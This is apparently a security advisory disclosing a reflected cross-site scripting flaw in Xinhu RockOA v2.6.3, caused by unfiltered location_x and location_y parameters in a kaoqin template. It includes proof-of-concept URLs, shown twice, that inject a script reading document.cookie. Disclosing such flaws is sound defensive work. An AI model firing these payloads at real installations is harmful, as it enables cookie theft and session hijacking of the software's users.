http(s)://ip:port/?a=locationchange&m=kaoqin&d=main&location_y=118.167806&scale=12&callback=backshow1717123083601_5578&location_x=);alert(document.cookie);%3C!--
and
http(s)://ip:port/?a=locationchange&m=kaoqin&d=main&location_y=118.167806&scale=12&callback=backshow1717123083601_5578&location_y=);alert(document.cookie);%3C!--
Summary
A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Xinhu RockOA v2.6.3.
Details
The XSS vulnerability originates from
/webmain/main/kaoqin/tpl_kaoqin_locationchange.html
:https://github.com/rainrocka/xinhu/blob/7a6debc029c7332756cc3cc75c7faba69639eb89/webmain/main/kaoqin/tpl_kaoqin_locationchange.html#L21 Since
$location_x
and$location_y
are not filtered.Proof of Concept (PoC)
http(s)://ip:port/?a=locationchange&m=kaoqin&d=main&location_y=118.167806&scale=12&callback=backshow1717123083601_5578&location_x=);alert(document.cookie);%3C!--
andhttp(s)://ip:port/?a=locationchange&m=kaoqin&d=main&location_y=118.167806&scale=12&callback=backshow1717123083601_5578&location_y=);alert(document.cookie);%3C!--